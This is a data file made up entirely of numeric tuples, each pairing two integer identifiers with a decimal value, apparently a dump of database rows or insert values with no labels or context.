(256, 293269, 1.05),
(256, 293287, 1.14331),
(256, 293288, 2.66339),
(256, 293289, 5.7332),
(256, 293290, 6.1332),
(256, 293291, 0.28),
(256, 293292, 0.91),
(256, 293293, 0.95669),
(256, 293294, 0.95669),
(256, 293295, 1.05),
(256, 293296, 0.98),
(256, 293297, 1.07331),
(256, 293298, 0.93331),
(256, 293299, 1.00331),
(256, 293300, 1.09669),
(256, 293301, 1.00331),
(256, 293302, 1.12),
(256, 293353, 0.95669),
(256, 293354, 0.86331),
(256, 293355, 0.98),
(256, 293356, 0.93331),
(256, 293357, 0.95669),
(256, 293358, 0.98),
(256, 293359, 1.00331),
(256, 293360, 0.91),
(256, 293361, 1.09669),
(256, 293362, 0.98),
(256, 293363, 1.02669),
(256, 293364, 1.05),
(256, 293365, 1.07331),
(256, 293366, 1.09669),
(256, 293367, 1.02669),
(256, 293368, 1.05),
(288, 293368, 1.05),
(256, 293369, 0.95669),
(256, 293370, 1.09669),
(256, 293371, 0.93331),
(256, 293372, 0.86331),
(256, 293373, 0.95669),
(256, 293374, 1.05),
(256, 293375, 0.86331),
(256, 293376, 1.02669),
(256, 293377, 0.79331),
(256, 293378, 0.93331),
(256, 293379, 0.84),
(256, 293380, 0.95669),
(256, 293381, 0.86331),
(256, 293382, 0.93331),
(256, 293383, 0.95669),
(256, 293384, 1.02669),
(256, 293385, 0.95669),
(256, 293386, 2.4666),
(256, 293387, 3),
(256, 293398, 2.6666),
(256, 293399, 1.02669),
(256, 293400, 1.14331),
(256, 293401, 1.00331),
(256, 293402, 1.12),
(256, 293538, 0.37331),
(256, 293539, 0.95669),
(256, 293540, 1.07331),
(256, 293541, 0.37331),
(256, 293542, 0.95669),
(256, 293543, 1.07331),
(256, 293544, 1.09669),
(256, 293545, 1.16669),
(256, 293546, 1.05),
(256, 293547, 1.00331),
(256, 293548, 0.95669),
(256, 293549, 1.07331),
(256, 293550, 0.95669),
(256, 293551, 1.02669),
(256, 293552, 0.32669),
(256, 293553, 0.98),
(256, 293554, 1.05),
(256, 293555, 1.02669),
(256, 293556, 1.16669),
(256, 293557, 0.95669),
(256, 293558, 1.05),
(256, 293559, 1.00331),
(256, 293560, 1.12),
(256, 293561, 1.00331),
(256, 293562, 1.16669),
(256, 293563, 0.37331),
(256, 293564, 0.98),
(256, 293565, 1.07331),
(256, 293566, 1.02662),
(256, 293567, 1.14331),
(256, 293568, 1.23669),
(256, 293569, 1.02669),
(256, 293570, 1.09669),
(256, 293571, 1.21331),
(256, 293572, 1.30669),
(257, 294254, 1.05),
(257, 294255, 1.14331),
(257, 294256, 1.00331),
(257, 294257, 1.12),
(257, 294258, 0.98),
(257, 294259, 0.93331),
(257, 294260, 1.09669),
(257, 294261, 0.28),
(257, 294262, 0.91),
(257, 294263, 1.00331),
(257, 294264, 0.93331),
(257, 294265, 1.19),
(257, 294266, 0.95669),
(257, 294267, 1.07331),
(257, 294268, 0.98),
(257, 294269, 1.09669),
(257, 294270, 1.07331),
(257, 294271, 1.02669),
(257, 294272, 1.12),
(257, 294273, 1.02669),
(257, 294274, 1.05),
(257, 294275, 1.14331),
(257, 294276, 0.95669),
(257, 294277, 1.07331),
(257, 294278, 0.98),
(257, 294279, 1.05),
(257, 294280, 0.95669),
(257, 294281, 1.14331),
(257, 294282, 1.12),
(257, 294283, 1.86662),
(257, 294284, 1.09669),
(257, 294285, 1.00331),
(257, 294286, 1.12),
(257, 294287, 1.00331),
(257, 294288, 1.00331),
(257, 294289, 1.21331),
(257, 294290, 1.09669),
(257, 294291, 0.37331),
(257, 294292, 0.95669),
(257, 294293, 1.05),
(257, 294301, 0.95669),
(257, 294302, 1.05),
(257, 294303, 0.84),
(257, 294304, 0.95669),
(257, 294305, 0.86331),
(257, 294306, 0.95669),
(257, 294307, 1.05),
(257, 294308, 1.00331),
(257, 294309, 0.98),
(257, 294310, 1.02669),
(257, 294311, 1.00331),
(306, 294311, 1.00331),
(257, 294312, 1.00331),
(257, 294313, 0.95669),
(257, 294384, 0.98),
(257, 294385, 0.95669),
(288, 294385, 0.95669),
(257, 294386, 0.93331),
(257, 294387, 0.98),
(257, 294388, 0.91),
(257, 294389, 1.02669),
(257, 294390, 1.02669),
(288, 294390, 2.05338),
(257, 294391, 1.00331),
(257, 294392, 1.02669),
(257, 294393, 0.88669),
(257, 294394, 1.21331),
(257, 294395, 0.86331),
(257, 294396, 0.98),
(257, 294397, 1.12),
(257, 294398, 1.00331),
(257, 294399, 1.00331),
(257, 294400, 0.84),
(306, 294400, 0.84),
(257, 294401, 1.05),
(257, 294402, 1.14331),
(257, 294403, 0.86331),
(257, 294404, 1.00331),
(257, 294405, 0.98),
(257, 294406, 0.84),
(257, 294407, 0.91),
(257, 294408, 1.07331),
(257, 294409, 0.91),
(257, 294410, 0.93331),
(257, 294411, 1.07331),
(257, 294412, 1.86662),
(306, 294412, 1.86662),
(257, 294413, 2.4666),
(257, 294414, 2.8),
(257, 294416, 2.6666),
(257, 294417, 1.09669),
(257, 294418, 1.05),
(257, 294419, 1.16669),
(257, 294420, 1.02669),
(257, 294421, 0.84),
(257, 294422, 0.98),
(257, 294423, 0.56),
(257, 294424, 2.05338),
(257, 294425, 1.12),
(257, 294426, 1.09669),
(257, 294427, 1.82),
(257, 294428, 1.07331),
(257, 294429, 1.07331),
(257, 294500, 0.51331),
(257, 294501, 1.07331),
(257, 294502, 1.16669),
(257, 294503, 0.93331),
(257, 294504, 1.00331),
(257, 294505, 0.98),
(257, 294506, 0.95669),
(257, 294507, 1.09669),
(257, 294508, 0.88669),
(257, 294509, 1.00331),
(257, 294510, 1.07331),
(257, 294511, 1.12),
(257, 294512, 1.91338),
(257, 294513, 1.07331),
(257, 294514, 1.07331),
(257, 294515, 2.00662),
(257, 294516, 1.07331),
(257, 294517, 1.09669),
(257, 294518, 0.42),
(257, 294519, 0.98),
(257, 294520, 1.19),
(257, 294521, 0.37331),
(257, 294522, 1.00331),
(257, 294523, 1.09669),
(257, 294524, 0.98),
(257, 294525, 1.09669),
(258, 295270, 1.09669),
(258, 295271, 1.16669),
(258, 295272, 1.05),
(258, 295273, 1.14331),
(258, 295274, 0.42),
(258, 295275, 0.98),
(258, 295276, 1.07331),
(258, 295277, 1.09669),
(258, 295278, 0.98),
(258, 295279, 1.09669),
(258, 295280, 0.98),
(258, 295281, 1.09669),
(258, 295282, 1.33),
(258, 295283, 1.05),
(258, 295284, 1.12),
(258, 295290, 1.00331),
(258, 295291, 1.12),
(258, 295292, 0.93331),
(258, 295293, 1.00331),
(258, 295294, 2.66339),
(305, 295294, 2.66339),
(258, 295295, 0.91),
(258, 295296, 1.00331),
(258, 295297, 0.93331),
(258, 295298, 1.05),
(258, 295299, 0.93331),
(258, 295300, 1.02669),
(258, 295301, 2.00662),
(258, 295302, 0.95669),
(292, 295302, 0.95669),
(258, 295303, 1.00331),
(258, 295304, 1.02669),
(258, 295305, 1.16669),
(258, 295306, 0.98),
(258, 295307, 1.05),
(292, 295307, 1.05),
(258, 295370, 0.86331),
(292, 295370, 0.86331),
(258, 295371, 0.95669),
(292, 295371, 0.95669),
(258, 295372, 0.84),
(292, 295372, 0.84),
(258, 295373, 0.91),
(292, 295373, 0.91),
(258, 295374, 0.84),
(258, 295375, 1.00331),
(258, 295376, 0.81669),
(258, 295377, 0.86331),
(258, 295378, 0.91),
(258, 295379, 1.68),
(292, 295379, 3.36),
(258, 295380, 0.93331),
(292, 295380, 1.86662),
(258, 295381, 0.95669),
(258, 295382, 0.91),
(292, 295382, 0.91),
(258, 295383, 1.12),
(258, 295384, 1.86662),
(258, 295385, 0.98),
(258, 295386, 0.91),
(258, 295387, 0.91),
(258, 295388, 0.95669),
(258, 295389, 0.81669),
(258, 295390, 0.93331),
(258, 295391, 0.95669),
(258, 295392, 0.95669),
(258, 295393, 1.02669),
(258, 295394, 0.95669),
(258, 295395, 1.96),
(258, 295396, 1.05),
(258, 295397, 0.98),
(258, 295398, 1.05),
(258, 295399, 1.12),
(258, 295400, 1.02669),
(258, 295401, 0.86331),
(258, 295402, 0.95669),
(258, 295403, 3.92),
(258, 295404, 1.00331),
(304, 295404, 1.00331),
(258, 295405, 0.91),
(258, 295406, 0.98),
(258, 295407, 0.88669),
(292, 295407, 0.88669),
(258, 295408, 0.93331),
(258, 295409, 0.98),
(258, 295410, 1.07331),
(258, 295411, 0.23331),
(258, 295412, 0.95669),
(258, 295413, 1.02669),
(258, 295414, 1.00331),
(258, 295415, 0.95669),
(258, 295416, 0.93331),
(258, 295417, 0.88669),
(258, 295418, 1.02669),
(258, 295419, 0.93331),
(258, 295420, 2.4666),
(258, 295421, 2.8),
(258, 295422, 0.14),
(258, 295423, 0.88669),
(258, 295424, 1.00331),
(258, 295428, 2.6666),
(258, 295429, 0.88669),
(258, 295430, 1.02669),
(258, 295431, 0.88669),
(258, 295432, 0.98),
(258, 295572, 0.60669),
(258, 295573, 1.07331),
(258, 295574, 1.16669),
(258, 295575, 1.05),
(258, 295576, 1.12),
(258, 295577, 0.42),
(258, 295578, 1.09669),
(258, 295579, 1.16669),
(258, 295580, 0.88669),
(258, 295581, 0.93331),
(258, 295582, 0.88669),
(292, 295582, 0.88669),
(258, 295583, 0.98),
(258, 295584, 0.60669),
(258, 295585, 1.07331),
(258, 295586, 1.19),
(258, 295587, 0.88669),
(258, 295588, 0.95669),
(258, 295589, 0.98),
(258, 295590, 1.16669),
(258, 295591, 0.23331),
(258, 295592, 0.88669),
(258, 295593, 1.00331),
(258, 295594, 0.32669),
(258, 295595, 1.00331),
(258, 295596, 1.09669),
(259, 296182, 1.23669),
(260, 296182, 1.23669),
(259, 296183, 1.05),
(260, 296183, 1.05),
(259, 296184, 1.23669),
(259, 296186, 1.19),
(259, 296187, 2.4666),
(259, 296188, 2.8),
(259, 296189, 2.6666),
(259, 296190, 1.19),
(259, 296191, 1.4),
(260, 296218, 1.4),
(260, 296222, 2.4666),
(260, 296223, 2.8),
(260, 296224, 2.6666),
(260, 296225, 1.09669),
(260, 296226, 1.21331),
(261, 296401, 0.32669),
(261, 296402, 0.95669),
(261, 296403, 1.14331),
(261, 296404, 1.02669),
(261, 296405, 1.07331),
(305, 296405, 1.07331),
(261, 296406, 0.32669),
(261, 296407, 0.93331),
(261, 296408, 1.00331),
(261, 296409, 0.32669),
(261, 296410, 1.02669),
(261, 296411, 1.09669),
(261, 296412, 0.46669),
(261, 296413, 1.05),
(261, 296414, 1.12),
(261, 296415, 1.09669),
(261, 296416, 1.26),
(261, 296417, 1.14331),
(261, 296418, 1.00331),
(261, 296419, 1.07331),
(261, 296420, 1.21331),
(261, 296421, 0.37331),
(261, 296422, 1.00331),
(261, 296423, 1.23669),
(261, 296424, 0.95669),
(261, 296425, 1.14331),
(261, 296426, 1.00331),
(261, 296427, 1.12),
(261, 296428, 1.02669),
(306, 296428, 2.05338),
(261, 296429, 1.23669),
(261, 296430, 0.42),
(261, 296431, 1.00331),
(261, 296432, 1.28331),
(261, 296433, 1.00331),
(261, 296434, 1.96),
(261, 296435, 1.21331),
(261, 296436, 1.14331),
(261, 296437, 1.12),
(261, 296438, 0.93331),
(261, 296439, 1.07331),
(261, 296440, 1.12),
(261, 296441, 0.91),
(261, 296442, 1.02669),
(261, 296443, 0.93331),
(261, 296444, 1.21331),
(261, 296445, 1.00331),
(261, 296446, 0.93331),
(261, 296447, 1.02669),
(261, 296448, 1.07331),
(261, 296456, 0.98),
(261, 296457, 1.05),
(261, 296458, 1.12),
(261, 296459, 1.09669),
(261, 296460, 1.35331),
(261, 296461, 3.00993),
(261, 296462, 1.09669),
(261, 296463, 1.07331),
(261, 296464, 1.12),
(261, 296465, 0.18669),
(261, 296466, 0.93331),
(261, 296467, 1.02669),
(261, 296468, 0.98),
(261, 296469, 1.23669),
(261, 296470, 0.95669),
(261, 296471, 1.09669),
(261, 296472, 1.00331),
(261, 296473, 1.07331),
(261, 296474, 0.88669),
(261, 296475, 1.00331),
(261, 296476, 1.00331),
(261, 296477, 1.07331),
(261, 296478, 0.88669),
(261, 296479, 0.98),
(261, 296480, 0.91),
(261, 296481, 0.98),
(261, 296482, 0.88669),
(261, 296483, 1.00331),
(261, 296484, 1.09669),
(261, 296485, 0.95669),
(261, 296486, 0.91),
(261, 296487, 1.05),
(261, 296488, 0.95669),
(261, 296489, 1.05),
(261, 296555, 0.95669),
(261, 296556, 1.72662),
(261, 296557, 2.1),
(261, 296558, 1.00331),
(261, 296559, 1.07331),
(261, 296560, 0.95669),
(261, 296561, 1.12),
(261, 296562, 1.00331),
(261, 296563, 1.12),
(261, 296564, 0.95669),
(261, 296565, 1.02669),
(261, 296566, 0.91),
(261, 296567, 0.95669),
(261, 296568, 1.23669),
(261, 296569, 0.91),
(261, 296570, 1.02669),
(261, 296571, 0.91),
(261, 296572, 1.00331),
(261, 296573, 1.00331),
(261, 296574, 1.05),
(261, 296575, 1.72662),
(261, 296576, 1.05),
(261, 296577, 0.95669),
(261, 296578, 1.02669),
(261, 296579, 1.00331),
(261, 296580, 1.12),
(261, 296581, 1.12),
(261, 296582, 0.98),
(261, 296583, 1.09669),
(261, 296584, 1.12),
(261, 296585, 2.00662),
(261, 296586, 0.98),
(261, 296587, 1.09669),
(261, 296588, 0.88669),
(261, 296589, 0.95669),
(261, 296590, 2.24),
(261, 296591, 1.07331),
(261, 296592, 0.98),
(261, 296593, 2.14662),
(261, 296594, 0.56),
(261, 296595, 1.05),
(261, 296596, 1.30669),
(261, 296597, 0.81669),
(261, 296598, 0.91),
(261, 296599, 1.07331),
(261, 296600, 0.95669),
(261, 296601, 0.86331),
(261, 296602, 0.95669),
(261, 296603, 1.77338),
(261, 296604, 1.96),
(261, 296605, 0.93331),
(261, 296606, 0.98),
(261, 296607, 2.4666),
(261, 296608, 2.8),
(261, 296614, 2.6666),
(261, 296615, 1.07331),
(261, 296616, 0.93331),
(261, 296617, 1.05),
(261, 296618, 0.98),
(288, 296618, 0.98),
(261, 296619, 1.09669),
(261, 296620, 1.77338),
(261, 296621, 1.96),
(261, 296687, 1.02669),
(261, 296688, 1.30669),
(261, 296689, 1.07331),
(261, 296690, 1.21331),
(261, 296691, 0.93331),
(261, 296692, 1.05),
(261, 296693, 0.32669),
(261, 296694, 1.00331),
(261, 296695, 1.09669),
(261, 296696, 0.98),
(261, 296697, 1.09669),
(261, 296698, 1.00331),
(261, 296699, 1.09669),
(261, 296700, 1.00331),
(261, 296701, 1.09669),
(261, 296702, 0.74662),
(261, 296703, 0.95669),
(261, 296704, 1.07331),
(261, 296705, 0.98),
(261, 296706, 1.07331),
(306, 296707, 0.32669),
(261, 296707, 0.65338),
(261, 296708, 1.82),
(261, 296709, 1.00331),
(261, 296710, 1.09669),
(261, 296711, 0.37331),
(261, 296712, 0.93331),
(261, 296713, 1.12),
(261, 296714, 2.14662),
(261, 296715, 1.14331),
(261, 296716, 1.21331),
(261, 296717, 1.07331),
(262, 297523, 1.16669),
(262, 297524, 1.00331),
(262, 297525, 1.12),
(262, 297526, 0.95669),
(262, 297527, 1.07331),
(262, 297528, 1.00331),
(262, 297529, 0.91),
(262, 297530, 1.02669),
(262, 297531, 1.14331),
(262, 297532, 1.05),
(262, 297533, 1.21331),
(262, 297534, 1.05),
(262, 297535, 1.14331),
(262, 297536, 0.95669),
(262, 297537, 1.07331),
(262, 297538, 0.37331),
(262, 297539, 1.00331),
(262, 297540, 1.05),
(262, 297572, 1.00331),
(262, 297573, 1.07331),
(262, 297574, 0.91),
(262, 297575, 1.00331),
(262, 297576, 2.66339),
(262, 297577, 0.28),
(262, 297578, 0.95669),
(262, 297579, 1.12),
(262, 297580, 0.18669),
(304, 297580, 0.18669),
(262, 297581, 0.91),
(262, 297582, 1.07331),
(262, 297583, 1.14331),
(288, 297583, 4.57324),
(262, 297584, 1.19),
(262, 297585, 1.19),
(262, 297586, 1.21331),
(262, 297587, 0.51331),
(262, 297588, 1.05),
(262, 297589, 1.16669),
(262, 297590, 0.28),
(262, 297591, 0.93331),
(262, 297592, 1.05),
(262, 297593, 1.00331),
(262, 297594, 0.91),
(262, 297595, 1.00331),
(262, 297596, 0.32669),
(306, 297596, 0.65338),
(262, 297597, 1.02669),
(262, 297598, 1.09669),
(262, 297599, 1.05),
(262, 297600, 1.19),
(262, 297601, 0.98),
(262, 297602, 1.05),
(262, 297603, 1.14331),
(262, 297604, 1.02669),
(262, 297668, 1.02669),
(306, 297669, 0.91),
(262, 297669, 1.82),
(262, 297670, 1.12),
(262, 297671, 1.05),
(262, 297672, 1.02669),
(262, 297673, 0.95669),
(262, 297674, 1.05),
(262, 297675, 1.91338),
(262, 297676, 2.1),
(262, 297677, 1.00331),
(262, 297678, 0.91),
(262, 297679, 1.02669),
(262, 297680, 0.51331),
(262, 297681, 1.07331),
(262, 297682, 1.19),
(262, 297683, 1.82),
(262, 297684, 1.16669),
(262, 297685, 1.00331),
(262, 297686, 0.28),
(262, 297687, 0.98),
(262, 297688, 1.07331),
(262, 297689, 0.91),
(262, 297690, 1.07331),
(262, 297691, 1.12),
(262, 297692, 0.98),
(262, 297693, 0.98),
(262, 297694, 1.09669),
(262, 297695, 1.00331),
(262, 297696, 1.91338),
(262, 297697, 0.86331),
(262, 297698, 0.98),
(262, 297699, 1.05),
(262, 297700, 0.98),
(262, 297701, 1.02669),
(262, 297702, 0.93331),
(262, 297703, 0.86331),
(262, 297704, 1.05),
(262, 297705, 0.91),
(262, 297706, 0.95669),
(262, 297707, 0.93331),
(262, 297708, 2.4666),
(262, 297709, 2.8),
(262, 297725, 2.6666),
(262, 297726, 1.00331),
(262, 297861, 0.95669),
(262, 297862, 0.91),
(262, 297863, 1.00331),
(262, 297864, 0.98),
(262, 297865, 1.09669),
(262, 297866, 1.00331),
(262, 297867, 1.09669),
(262, 297868, 0.95669),
(262, 297869, 1.02669),
(262, 297870, 0.51331),
(262, 297871, 1.00331),
(262, 297872, 1.21331),
(262, 297873, 1.16669),
(262, 297874, 1.28331),
(262, 297875, 1.00331),
(262, 297876, 0.86331),
(262, 297877, 0.95669),
(262, 297878, 0.46669),
(262, 297879, 1.02669),
(262, 297880, 1.30669),
(262, 297881, 0.32669),
(262, 297882, 0.93331),
(262, 297883, 1.05),
(262, 297884, 0.98),
(262, 297885, 1.14331),
(262, 297886, 0.46669),
(262, 297887, 1.19),
(262, 297888, 1.30669),
(262, 297889, 0.84),
(262, 297890, 0.91),
(262, 297891, 0.37331),
(262, 297892, 1.00331),
(262, 297893, 1.09669),
(262, 297894, 1.14331),
(262, 297895, 0.95669),
(262, 297896, 1.02669),
(263, 299488, 1.02669),
(263, 299489, 1.09669),
(263, 299490, 0.93331),
(263, 299491, 0.98),
(263, 299492, 0.91),
(263, 299493, 1.02669),
(263, 299494, 0.95669),
(263, 299495, 0.95669),
(263, 299496, 1.05),
(263, 299497, 0.98),
(263, 299498, 1.07331),
(263, 299499, 1.00331),
(263, 299500, 1.07331),
(263, 299501, 1.07331),
(263, 299502, 1.16669),
(263, 299503, 0.93331),
(263, 299504, 1.12),
(263, 299505, 0.93331),
(263, 299506, 1.00331),
(263, 299507, 1.12),
(263, 299508, 1.21331),
(263, 299509, 0.98),
(263, 299510, 1.05),
(263, 299511, 0.46669),
(263, 299512, 1.02669),
(263, 299513, 1.19),
(263, 299514, 0.46669),
(263, 299515, 1.05),
(263, 299516, 1.14331),
(263, 299517, 3.00993),
(263, 299518, 1.33),
(263, 299519, 1.14331),
(263, 299520, 1.09669),
(263, 299521, 0.84),
(305, 299521, 0.84),
(263, 299522, 0.95669),
(305, 299522, 0.95669),
(263, 299523, 0.91),
(263, 299524, 0.98),
(263, 299525, 1.05),
(263, 299526, 0.95669),
(263, 299527, 1.07331),
(263, 299528, 0.86331),
(263, 299529, 0.95669),
(263, 299530, 0.91),
(263, 299531, 1.05),
(263, 299532, 0.95669),
(263, 299533, 1.07331),
(263, 299553, 0.86331),
(263, 299554, 1.07331),
(263, 299555, 1.00331),
(263, 299556, 1.26),
(263, 299557, 1.05),
(263, 299558, 0.23331),
(263, 299559, 0.93331),
(263, 299560, 1.14331),
(263, 299561, 0.93331),
(263, 299562, 1.09669),
(263, 299563, 1.09669),
(263, 299564, 0.93331),
(263, 299565, 1.07331),
(263, 299566, 1.02669),
(263, 299567, 0.93331),
(263, 299568, 1.02669),
(263, 299569, 1.02669),
(263, 299570, 0.98),
(263, 299571, 1.05),
(263, 299572, 1.05),
(263, 299573, 1.02669),
(263, 299636, 0.37331),
(263, 299637, 0.98),
(263, 299638, 1.21331),
(263, 299639, 0.95669),
(263, 299640, 0.86331),
(263, 299641, 1.00331),
(263, 299642, 0.98),
(263, 299643, 2.66007),
(263, 299644, 1.96),
(263, 299645, 0.98),
(263, 299646, 0.46669),
(263, 299647, 1.00331),
(263, 299648, 1.12),
(263, 299649, 0.46669),
(263, 299650, 1.09669),
(263, 299651, 1.16669),
(263, 299652, 0.37331),
(263, 299653, 0.98),
(263, 299654, 1.14331),
(263, 299655, 1.91338),
(263, 299656, 1.02669),
(263, 299657, 1.14331),
(263, 299658, 0.46669),
(263, 299659, 1.02669),
(263, 299660, 1.14331),
(263, 299661, 1.00331),
(263, 299662, 0.95669),
(263, 299663, 1.02669),
(263, 299664, 1.00331),
(263, 299665, 0.86331),
(263, 299666, 1.00331),
(263, 299667, 0.95669),
(263, 299668, 0.88669),
(263, 299669, 0.95669),
(263, 299670, 0.93331),
(263, 299671, 0.95669),
(263, 299672, 1.00331),
(263, 299673, 2.4666),
(263, 299674, 2.8),
(263, 299685, 2.6666),
(263, 299686, 0.98),
(263, 299687, 1.19),
(263, 299815, 0.86331),
(263, 299816, 0.93331),
(263, 299817, 0.95669),
(263, 299818, 1.12),
(263, 299819, 1.09669),
(263, 299820, 0.98),
(263, 299821, 1.07331),
(263, 299822, 1.09669),
(263, 299823, 0.95669),
(263, 299824, 1.12),
(263, 299825, 0.23331),
(263, 299826, 0.88669),
(263, 299827, 1.00331),
(263, 299828, 1.14331),
(263, 299829, 1.26),
(263, 299830, 1.02669),
(263, 299831, 1.19),
(263, 299832, 0.95669),
(263, 299833, 1.05),
(263, 299834, 0.7),
(263, 299835, 1.26),
(263, 299836, 1.35331),
(263, 299837, 0.37331),
(288, 299837, 0.37331),
(263, 299838, 1.12),
(263, 299839, 1.33),
(263, 299840, 1.02669),
(263, 299841, 1.12),
(263, 299842, 0.28),
(263, 299843, 0.98),
(263, 299844, 1.14331),
(264, 300434, 1.21331),
(264, 300435, 0.65338),
(264, 300436, 2.05338),
(264, 300437, 1.12),
(264, 300438, 1.14331),
(264, 300439, 1.09669),
(264, 300440, 1.35331),
(264, 300441, 1.00331),
(264, 300442, 1.09669),
(264, 300443, 0.37331),
(264, 300444, 0.95669),
(264, 300445, 1.05),
(264, 300446, 0.84),
(264, 300447, 0.93331),
(264, 300470, 0.93331),
(264, 300471, 1.05),
(264, 300472, 0.91),
(264, 300473, 1.21331),
(264, 300474, 0.95669),
(264, 300475, 1.05),
(264, 300476, 0.37331),
(264, 300477, 2.66339),
(290, 300477, 2.66339),
(264, 300478, 0.95669),
(264, 300479, 1.21331),
(264, 300480, 0.98),
(264, 300481, 1.12),
(264, 300482, 1.16669),
(264, 300483, 1.07331),
(264, 300484, 1.07331),
(264, 300485, 1.23669),
(264, 300486, 1.05),
(264, 300487, 0.28),
(292, 300487, 0.28),
(264, 300488, 0.91),
(264, 300489, 1.02669),
(264, 300490, 0.88669),
(264, 300491, 0.98),
(264, 300492, 0.93331),
(264, 300493, 1.07331),
(264, 300494, 1.05),
(264, 300495, 1.07331),
(264, 300529, 0.98),
(264, 300530, 1.09669),
(264, 300531, 0.86331),
(264, 300532, 0.98),
(264, 300533, 0.98),
(264, 300534, 1.05),
(264, 300535, 1.19),
(264, 300536, 0.84),
(264, 300537, 0.91),
(264, 300538, 0.95669),
(264, 300539, 1.05),
(264, 300540, 0.93331),
(264, 300541, 0.95669),
(264, 300542, 1.02669),
(264, 300543, 1.00331),
(264, 300544, 0.98),
(264, 300545, 0.95669),
(264, 300546, 1.02669),
(264, 300547, 2.4666),
(264, 300548, 2.8),
(264, 300549, 2.6666),
(264, 300550, 1.00331),
(264, 300551, 0.91),
(264, 300552, 1.02669),
(264, 300624, 0.14),
(264, 300625, 0.81669),
(264, 300626, 0.88669),
(264, 300627, 0.93331),
(264, 300628, 1.07331),
(264, 300629, 0.93331),
(264, 300630, 1.07331),
(264, 300631, 1.07331),
(264, 300632, 1.16669),
(264, 300633, 0.98),
(264, 300634, 1.07331),
(264, 300635, 0.95669),
(264, 300636, 1.14331),
(264, 300637, 0.98007),
(264, 300638, 0.91),
(264, 300639, 1.00331),
(264, 300640, 0.93331),
(264, 300641, 1.05),
(264, 300642, 0.95669),
(264, 300643, 1.07331),
(264, 300644, 4.29324),
(264, 300645, 1.21331),
(264, 300646, 1.14331),
(264, 300647, 1.16669),
(264, 300648, 1.19),
(264, 300649, 0.95669),
(264, 300650, 1.07331),
(264, 300651, 1.14331),
(264, 300652, 1.23669),
(264, 300653, 1.02669),
(264, 300654, 1.12),
(264, 300655, 1.02669),
(264, 300656, 1.12),
(264, 300657, 1.09669),
(264, 300658, 1.21331),
(264, 300659, 0.95669),
(264, 300660, 1.05),
(264, 300661, 0.98),
(264, 300662, 1.12),
(264, 300663, 1.00331),
(264, 300664, 1.09669),
(264, 300665, 0.37331),
(264, 300666, 0.98),
(264, 300667, 1.12),
(264, 300668, 0.46669),
(264, 300669, 1.00331),
(264, 300670, 1.09669),
(264, 300671, 0.95669),
(264, 300672, 1.05),
(265, 300846, 2.4666),
(265, 300847, 2.8),
(265, 300848, 2.6666),
(266, 300854, 2.4666),
(266, 300855, 2.8),
(266, 300856, 2.6666),
(267, 300876, 0.77),
(267, 300877, 0.81669),
(267, 301022, 1.12),
(267, 301023, 0.93331),
(267, 301024, 1.19),
(306, 301025, 0.46669),
(267, 301025, 0.93338),
(267, 301026, 1.07331),
(267, 301027, 1.28331),
(267, 301028, 0.98),
(267, 301029, 1.12),
(267, 301030, 0.46669),
(267, 301031, 1.02669),
(267, 301032, 1.07331),
(267, 301033, 1.07331),
(267, 301034, 1.14331),
(267, 301035, 1.07331),
(267, 301036, 1.19),
(267, 301037, 1.28331),
(267, 301038, 0.95669),
(267, 301039, 0.91),
(267, 301040, 1.02669),
(267, 301041, 0.98),
(267, 301042, 0.98),
(267, 301043, 1.07331),
(267, 301044, 0.93331),
(267, 301045, 1.00331),
(267, 301046, 1.02669),
(267, 301047, 1.12),
(267, 301048, 0.93331),
(267, 301049, 1.00331),
(267, 301050, 0.93331),
(267, 301051, 1.05),
(267, 301052, 0.91),
(267, 301053, 0.98),
(267, 301066, 0.88669),
(267, 301067, 1.00331),
(267, 301068, 0.88669),
(267, 301069, 0.98),
(267, 301070, 0.91),
(267, 301071, 0.98),
(267, 301072, 0.42),
(267, 301073, 1.14331),
(267, 301074, 1.23669),
(267, 301075, 2.66339),
(288, 301075, 2.66339),
(267, 301076, 0.18669),
(267, 301077, 0.91),
(267, 301078, 1.07331),
(267, 301079, 0.88669),
(267, 301080, 1.07331),
(267, 301081, 1.00331),
(267, 301082, 1.12),
(267, 301083, 0.95669),
(267, 301084, 1.07331),
(267, 301085, 0.93331),
(267, 301086, 1.02669),
(267, 301087, 0.95669),
(267, 301088, 1.09669),
(267, 301153, 1.00331),
(267, 301154, 1.72662),
(267, 301155, 0.95669),
(267, 301156, 0.95669),
(267, 301157, 1.07331),
(267, 301158, 1.07331),
(267, 301159, 1.21331),
(267, 301160, 1.12),
(267, 301161, 0.37331),
(267, 301162, 0.98),
(267, 301163, 1.21331),
(267, 301164, 1.12),
(267, 301165, 1.23669),
(267, 301166, 0.98),
(267, 301167, 1.09669),
(267, 301168, 1.91338),
(267, 301169, 1.16669),
(267, 301170, 1.30669),
(267, 301171, 2.19338),
(267, 301172, 1.09669),
(267, 301173, 0.93331),
(267, 301174, 1.02669),
(267, 301175, 1.02669),
(267, 301176, 0.95669),
(267, 301177, 0.91),
(267, 301178, 1.00331),
(267, 301179, 0.95669),
(267, 301180, 1.12),
(267, 301181, 1.12),
(267, 301182, 1.21331),
(267, 301183, 1.09669),
(267, 301184, 1.16669),
(267, 301185, 0.81669),
(267, 301186, 0.95669),
(267, 301187, 1.05),
(267, 301188, 0.86331),
(267, 301189, 0.98),
(267, 301190, 0.14),
(267, 301191, 0.84),
(267, 301192, 0.88669),
(267, 301193, 0.91),
(267, 301194, 0.93331),
(267, 301195, 0.93331),
(267, 301196, 1.19),
(267, 301197, 0.95669),
(267, 301198, 0.95669),
(267, 301199, 1.02669),
(267, 301200, 2.4666),
(267, 301201, 2.8),
(267, 301210, 2.6666),
(267, 301211, 1.00331),
(267, 301212, 1.09669),
(267, 301213, 0.91),
(305, 301213, 0.91),
(288, 301213, 5.85),
(267, 301214, 1.02669),
(267, 301314, 0.46669),
(267, 301315, 1.14331),
(267, 301316, 1.33),
(267, 301317, 0.95669),
(267, 301318, 1.05),
(267, 301319, 1.05),
(267, 301320, 1.28331),
(267, 301321, 1.07331),
(267, 301322, 1.19),
(267, 301323, 1.02669),
(267, 301324, 1.09669),
(267, 301325, 1.02669),
(267, 301326, 0.95669),
(267, 301327, 1.02669),
(267, 301328, 0.95669),
(268, 302054, 1.14331),
(268, 302055, 1.02669),
(268, 302056, 1.05),
(268, 302057, 1.12),
(268, 302058, 1.05),
(268, 302059, 1.16669),
(268, 302060, 0.46669),
(268, 302061, 1.05),
(268, 302062, 1.16669),
(268, 302063, 0.32669),
(268, 302064, 0.95669),
(268, 302065, 1.12),
(268, 302066, 1.05),
(268, 302067, 1.14331),
(268, 302068, 0.98),
(268, 302069, 1.00331),
(268, 302070, 2.05338),
(268, 302071, 1.96),
(268, 302072, 2.14662),
